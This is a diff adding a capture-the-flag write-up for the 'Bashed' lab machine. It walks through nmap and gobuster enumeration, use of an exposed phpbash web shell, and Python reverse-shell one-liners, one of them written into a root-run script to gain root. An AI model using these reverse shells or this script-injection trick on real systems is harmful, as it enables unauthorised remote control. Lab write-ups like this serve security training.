|
| 1 | +# Bashed - Linux (Easy) |
| 2 | + |
| 3 | +## Summary |
| 4 | + |
| 5 | +This box is inspired by [Phpbash by Arrexel](https://github.com/Arrexel/phpbash), a standalone, semi-interactive web shell. This is a fairly quick and straightforward box and as a result, this will be a relatively short writeup. |
| 6 | + |
| 7 | +### Enumeration |
| 8 | + |
| 9 | +I began Enumeration by running a Nmap script on the target which only indicated that HTTP (Port 80) was worth checking out. |
| 10 | + |
| 11 | +``` |
| 12 | +sudo nmap -sV -sC -A -T4 $machine_IP -vv |
| 13 | +
|
| 14 | +-sV Version Scan |
| 15 | +-sC - Script Scan |
| 16 | +-A - Aggresive Scan |
| 17 | +-T4 - Aggresive Timing Template |
| 18 | +-vv - very verbose |
| 19 | +``` |
| 20 | + |
| 21 | + |
| 22 | + |
| 23 | + |
| 24 | + |
| 25 | +### Gobuster Recon |
| 26 | + |
| 27 | +Enumerating Port 80, I ran Gobuster on the target, specifying certain extensions - `.php, .js, .html, .txt` |
| 28 | + |
| 29 | +``` |
| 30 | +sudo gobuster dir -u "$machine_IP" -w "wordlist" -t50 -x php,js,html,txt |
| 31 | +
|
| 32 | +"-w" - specify wordlist |
| 33 | +"-t 50" - 50 Threads |
| 34 | +"-x" - flag to specify directory extensions |
| 35 | +``` |
| 36 | + |
| 37 | + |
| 38 | + |
| 39 | +This provided a variety of directories mapped to the target. Meanwhile, I manually crawled the target and making the connection between the [GitHub Repo](https://github.com/Arrexel/phpbash) and the target set me up well for what was to come. |
| 40 | + |
| 41 | + |
| 42 | + |
| 43 | +Traversing through the results of the Gobuster scan led me to `/dev` which contained `phpbash.php`. |
| 44 | + |
| 45 | + |
| 46 | + |
| 47 | +Executing Phpbash gave me a web based shell providing me with a `www-data` user foothold with the `user.txt` flag being present |
| 48 | + |
| 49 | + |
| 50 | + |
| 51 | +Despite getting a user shell, it is important to note that this is all still being done on the web shell. The next step en route to Privilege Escalation is to upgrade the web shell to one that is interactive from the attacker's machine. This is done by running the following reverse shell on the victim piped to a particular port while having a netcat listener on the attacker's machine on the same port. |
| 52 | + |
| 53 | +``` |
| 54 | +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$machine_IP","LPORT"));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' |
| 55 | +``` |
| 56 | + |
| 57 | +The shell received is less than stable so I spawned a TTY shell |
| 58 | + |
| 59 | +``` |
| 60 | +python -c 'import pty; pty.spawn("/bin/sh")' |
| 61 | +``` |
| 62 | + |
| 63 | + |
| 64 | + |
| 65 | +## Privilege Escalation |
| 66 | + |
| 67 | +After getting the user flag, I ran `sudo -l` on the target to identify what can be run as the root user, which shows that the user can run the `scriptmanager` scripts without requiring root access. |
| 68 | + |
| 69 | + |
| 70 | + |
| 71 | +I was able to move to the `scriptmanager` directory with the following command to get a bash shell |
| 72 | + |
| 73 | +``` |
| 74 | +sudo -u scriptmanager /bin/bash |
| 75 | +``` |
| 76 | + |
| 77 | +After getting access to the scripts in the directory, I recycled the reverse shell payload by changing the LPORT number from the initial reverse shell to get user foothold and appending it to the end of `cool.py`. |
| 78 | + |
| 79 | +``` |
| 80 | +echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$machine_IP\","LPORT"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > cool.py |
| 81 | +``` |
| 82 | + |
| 83 | + |
| 84 | + |
| 85 | +To catch the shell, I had a netcat listener on the same port, which allowed me to get a root shell and capture the root flag. |
| 86 | + |
| 87 | + |
| 88 | + |
| 89 | + |
| 90 | + |
| 91 | +### Completion |
| 92 | + |
| 93 | + |
0 commit comments